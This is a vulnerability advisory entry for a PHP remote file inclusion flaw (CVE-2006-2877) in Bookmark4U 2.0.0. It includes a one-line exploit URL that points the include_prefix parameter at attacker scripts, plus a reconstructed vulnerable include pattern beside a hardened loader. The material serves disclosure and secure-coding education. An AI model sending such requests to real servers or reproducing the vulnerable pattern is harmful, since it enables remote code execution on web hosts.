Bookmark4U Multiple Remote File Include Vulnerabilities

Vulnerability ID: 1110400 | Vulnerability type: input validation
Published: 2006-06-05 | Updated: 2006-10-30
CVE ID: CVE-2006-2877 | CNNVD ID: CNNVD-200606-140
Platform: PHP | CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/27976
https://cxsecurity.com/issue/WLB-2006060064
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-140
|Vulnerability Details
Bookmark4U 2.0.0 and earlier contain PHP remote file inclusion vulnerabilities that allow remote attackers to include arbitrary PHP files via the include_prefix parameter in (1) inc/dbase.php, (2) inc/config.php, (3) inc/common.php and (4) inc/function.php. Note: the inc directory is reportedly protected by an .htaccess file, so this issue only occurs in certain environments or configurations.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/18281/info

Bookmark4U is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/[Bookmark4Upath]/inc/function.php?env[include_prefix]=[evil_scripts]
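The root cause described above is an include() whose path prefix can be populated from the request (the env[include_prefix] array parameter, via register_globals). The following is an added example, not Bookmark4U's own code: a hypothetical reconstruction of that pattern next to a hardened loader that ignores request data and confines includes to the application's inc/ directory; the directory name BM4U_INC_DIR and the module names are assumptions.

```php
<?php
// Added example (not Bookmark4U's code). The vulnerable function is a
// hypothetical reconstruction of the pattern the advisory describes.

// VULNERABLE (hypothetical): with register_globals = On, a request to
// inc/function.php?env[include_prefix]=... fills $env from the query string,
// so the include() fetches and executes whatever file the caller names,
// including a remote URL when allow_url_fopen/allow_url_include permit it.
function load_vulnerable(array $env): void
{
    include $env['include_prefix'] . 'common.php';
}

// HARDENED: the base directory is a server-side constant, never request
// data, and only a validated module name is accepted from the caller.
define('BM4U_INC_DIR', __DIR__ . '/inc');   // assumption: install layout

function load_hardened(string $module): void
{
    // Accept plain module names only; a URL or "../" can never match.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $module)) {
        throw new InvalidArgumentException("invalid module name: $module");
    }

    $base = realpath(BM4U_INC_DIR);
    $path = realpath(BM4U_INC_DIR . '/' . $module . '.php');

    // realpath() returns false for a missing file and resolves symlinks and
    // "..", so a second check that the result is still under inc/ closes the
    // gap even if the name check were loosened later.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("refusing to include outside inc/: $module");
    }

    require $path;
}

// Defence in depth, set in php.ini rather than at runtime (both directives
// are PHP_INI_SYSTEM): register_globals = Off and allow_url_include = Off.
// With those off, the vulnerable function above cannot be reached with a
// request-supplied prefix and cannot execute a remote file at all.

load_hardened('common');
```

Only the module name crosses the trust boundary; the prefix that the advisory shows being taken from the request is never read from user input in the hardened loader.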
|References

Source: XF
Name: bookmark4u-includeprefix-file-include (26933)
Link: http://xforce.iss.net/xforce/xfdb/26933
Source: BID
Name: 18281
Link: http://www.securityfocus.com/bid/18281
Source: BUGTRAQ
Name: 20060605 Re: Bookmark4U Remote File Include
Link: http://www.securityfocus.com/archive/1/archive/1/436027/100/0/threaded
Source: BUGTRAQ
Name: 20060604 Bookmark4U Remote File Include
Link: http://www.securityfocus.com/archive/1/archive/1/435964/100/0/threaded
Source: OSVDB
Name: 26602
Link: http://www.osvdb.org/26602
Source: OSVDB
Name: 26601
Link: http://www.osvdb.org/26601
Source: OSVDB
Name: 26600
Link: http://www.osvdb.org/26600
Source: OSVDB
Name: 26599
Link: http://www.osvdb.org/26599
Source: SECTRACK
Name: 1016224
Link: http://securitytracker.com/id?1016224
Source: SREASON
Name: 1058
Link: http://securityreason.com/securityalert/1058
Source: SECUNIA
Name: 19758
Link: http://secunia.com/advisories/19758